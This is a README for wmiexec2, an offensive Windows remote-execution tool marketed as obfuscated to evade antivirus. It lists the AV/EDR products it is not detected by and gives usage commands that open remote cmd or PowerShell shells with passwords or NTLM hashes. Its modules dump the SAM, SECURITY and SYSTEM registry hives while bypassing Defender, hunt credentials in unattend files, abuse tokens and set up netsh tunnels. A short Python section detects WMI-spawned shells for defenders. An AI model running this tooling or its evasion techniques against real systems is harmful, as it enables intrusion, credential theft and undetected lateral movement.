Wmiexec2
wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well-known signatures from various AV engines. It also has a handful of additional built-in modules to help automate some common tasks on red team engagements.
⚡ wmiexec2.0 ⚡
The stealthy upgrade to everyone's favorite wmiexec: obfuscated, enhanced, and red team ready.
💀 Bypass AV. Automate engagements. Dominate.
🚀 Features
- 🎭 Obfuscated to evade signature-based AV detection
- 🛠️ Built-in red team modules for rapid automation
- 🐚 Supports cmd and powershell shell types
- 📁 Local and remote file transfer (lput, lget)
- 📡 Netsh tunneling, token abuse, VM detection, and more
📦 Installation
git clone https://github.com/ice-wzl/wmiexec2.git
cd wmiexec2/
pip3 install -r requirements.txt
⚠️ Do NOT use wget on GitHub Raw — it will break emoji characters. Always use git clone.
🧪 AV / EDR Compatibility
| Environment                                         | Result                     |
|-----------------------------------------------------|----------------------------|
| Windows Server 2022 (Feb 2024 updates)              | ✅ All modules working     |
| Windows 10 Pro, Defender v1.381.3595.0              | ✅ All modules working     |
| Windows 10 Pro, Kaspersky Standard 21.8.5           | ✅ All modules working     |
| Windows 8, Defender v1.383.35.0                     | ✅ All modules working     |
| Windows 7 Pro, Defender v1.95.191.0 (2010)          | ⚠️ Reg module not working  |
🔧 Usage
python3 wmiexec2.py DOMAIN/USERNAME:PASSWORD@10.0.0.2 --shell-type powershell
python3 wmiexec2.py WORKGROUP/Administrator:'Password123!@#'@10.0.0.4 --shell-type cmd
Supports both password and NTLM hash authentication
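On the defending side, signature evasion does not change process lineage: a shell started through WMI's Win32_Process.Create runs as a child of WmiPrvSE.exe. The following detection sketch is an added example, not code from the wmiexec2 project; it assumes the tool keeps wmiexec's WMI execution path and that events use Sysmon Event ID 1 field names, and the sample events are constructed.

```python
import ntpath

# Shell types the README lists for --shell-type.
SHELLS = {"cmd.exe", "powershell.exe"}
# Processes created through WMI's Win32_Process.Create run under this parent.
WMI_HOST = "wmiprvse.exe"

# Constructed sample events (Sysmon Event ID 1 field names), not real telemetry.
SAMPLE_EVENTS = [
    {"Computer": "WS01", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": "cmd.exe /c hostname"},
    {"Computer": "WS01", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe"},
    {"Computer": "SRV02", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": "powershell.exe -Command Get-Process"},
    {"Computer": "SRV02", "Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": "msiexec.exe /V"},
]


def is_wmi_spawned_shell(event):
    """True when cmd.exe or powershell.exe was created by the WMI provider host."""
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    child = ntpath.basename(event.get("Image", "")).lower()
    return parent == WMI_HOST and child in SHELLS


def find_wmi_shells(events):
    """Group matching events by host and return {host: [command lines]}."""
    hits = {}
    for ev in events:
        if is_wmi_spawned_shell(ev):
            host = ev.get("Computer", "unknown")
            hits.setdefault(host, []).append(ev.get("CommandLine", ""))
    return hits


if __name__ == "__main__":
    for host, cmds in find_wmi_shells(SAMPLE_EVENTS).items():
        print(host, cmds)
```

Legitimate management tooling also launches shells through WMI, so baseline known sources per host before alerting on this lineage.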
📚 Commands
| Command | Description |
|--------------------------|-------------------------------------------------------|
| help | Show available modules |
| lcd <path> | Change local working directory |
| exit | Exit shell |
| lput <src> <dst> | Upload file to target |
| lget <file> | Download file from target |
| !<command> | Run a command locally (e.g., !ls) |
| ls [path] | List target directory (uses dir /a) |
| cat <file> | Show remote file contents (alias for type) |
🧠 Modules
sysinfo
Display target user, hostname, IP, and architecture.
sysinfo
av
Lists common AV product processes via remote enumeration.
av
defender
Checks Defender installation, service status, exclusions, and tamper protection.
defender
vmcheck
Detects ESXi, VMware, QEMU, and VirtualBox environments.
vmcheck
unattend
Searches for unattended install config files that may contain credentials.
unattend
regrip
Dumps SAM, SECURITY, and SYSTEM hives (bypasses Defender as of 6/7/24).
regrip
loggrab
Download .evtx logs from remote system.
loggrab Security.evtx
tokens
Enumerates active tokens and suggests privesc paths.
tokens
survey / survey save
Run custom recon commands listed in survey.conf.
survey
survey save
Netsh Tunneling
addtun 10000 10.0.0.5 443
showtun
deltun 10000
🛠 Known impacket NAT Fix
If you get this error:
[-] Can't find a valid stringBinding to connect
➤ Fix
- Locate your dcomrt.py:

      find / -type f -name "dcomrt.py" 2>/dev/null

- Edit and replace:

      # raise Exception("Can't find a valid stringBinding to connect")
      stringBinding = 'ncacn_ip_tcp:%s%s' % (self.get_target(), bindingPort)
      LOG.info("Can't find a valid stringBinding to connect, using default!")
✅ Done!
💡 Notes
- This tool is under active development — submit PRs or issues.
- All modules built for stealth and speed.
- Use responsibly in authorized engagements.
⭐ If This Helped You
If wmiexec2.0 saved you time or helped your ops:
🧠 Spread the knowledge. 🌍 Share the repo. ⭐ Star it.
👻 Author
ice-wzl
🐙 GitHub: ice-wzl
🛠️ Built with ❤️ for red teams.
